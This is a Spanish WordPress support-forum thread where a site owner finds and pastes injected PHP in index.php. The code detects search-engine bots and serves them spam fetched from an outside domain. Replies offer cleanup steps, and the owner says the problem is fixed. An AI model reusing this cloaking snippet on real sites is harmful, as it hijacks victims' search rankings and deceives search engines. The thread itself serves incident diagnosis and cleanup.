Se inyecta código en mi index.php

Resuelto Mao Mardones
(@mao-mardones)

hace 10 meses, 1 semana
Hola a todos,
En el Google Search Console me salió un aviso de «La página AMP no es válida» y al revisarlo comprobé que «La URL de AMP de referencia es de otra página canónica». Buscando mucho me encontré con el index.php del WordPress tiene el siguiente código:
```
<?php
function is_bot() {
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool', 'AhrefsBot');
    
    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            return true;
        }
    } 
    return false;
}
if (is_bot()) {
    $message = file_get_contents('https://anjayseo.com/amp/universitasalbertiana.org/index.txt'); //
    echo $message;
    exit; // Atau bisa menggunakan die(); 
}
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
```
Primero probé de borrar el archivo y subir uno limpio, pero al cabo de unos segundo el archivo limpio se reescribe con el código que les pegue. He cambiado permisos, modificado el .htaccess, instalado el Wordfence, limpiado la base de datos, y he borrado todo para instalar el wordpress, la plantilla y los plugins limpios, pero no hay forma, el código se vuelve a reescribir en el index.php.

El servidor es Ionos (sé que es malo pero es el que tenía contratado el cliente con otras web, que a todo esto, hay WordPress y no tiene este problema) y tiene la Site Scan contratada. Anoche seguí todos los pasos de la guía https://es.wordpress.org/support/topic/limpiar-un-wordpress-infectadohackeado/ pero no logro dar con el problema.

Por favor, si a alguien le ha pasado o tiene alguna idea de como solucionarlo y que me pueda orientar, lo agradecería mucho!!

La página con la que necesito ayuda: [accede para ver el enlace]

Viendo 2 respuestas - de la 1 a la 2 (de un total de 2)

Javier Casares
(@javiercasares)

hace 10 meses, 1 semana
Si los pasos de la guía no te han funcionado, prueba con este, que es similar pero diferente. https://www.wpsysadmin.com/seguridad/especial/limpiar/

En caso de que no lo consigas, quizá deberías contactar con un especialista en limpiar hackeos y ver qué hacer.

En cualquier caso, otra opción, es:
1. Hacer un backup de la base de datos
2. Guardar la carpeta /wp-content/uploads/
3. En local, descargar todos los elementos del WordPress (ZIP del núcleo, todos los temas, todos los plugins).
4. Añadir, a esa instalación en local, la carpeta del uploads.
5. Subir esa versión del sitio, eliminando la anterior (o cambiándola de carpeta o lo que sea).
Es importante que en este último punto no sea un «sobrescribir» sino, borrar y subir de nuevo, para asegurarte que no se hayan quedado contenidos hackeados o potencialmente inseguros allí.

Haciendo esto seguro que debe funcionar (vamos, es el sistema que yo suelo usar para limpiar ataques).

Si sigue pasando, entonces habría que analizar la base de datos, ya que el problema podría ser una inyección de código en la base de datos, que es algo más complejo de detectar.
Iniciador del debate Mao Mardones
(@mao-mardones)

hace 10 meses

Hola Javier,

Muchas gracias por tu rápida respuesta, el enlace que enviaste me vino genial y ahí encontré la solución.

Finalmente cambié los permisos sólo del archivo index.php a 444 y comprobé que ya no se modificaba. Acto seguido descargué todo a local, reemplacé plantilla y plugins por las últimas versiones descargadas individualmente. Luego cambié el nombre del directorio y subí de nuevo todo el contenido. Asigné los permisos tal como indicaba la guía que enviaste y reapunté el dominio al directorio renombrado… y funcionó!!

Un saludo
Mauricio

Viendo 2 respuestas - de la 1 a la 2 (de un total de 2)

El debate ‘Se inyecta código en mi index.php’ está cerrado a nuevas respuestas.

Etiquetas

Debates

Debates populares

Debates sin respuestas

Debates que no son soporte

Debates resueltos

Debates no resueltos

Todos los debates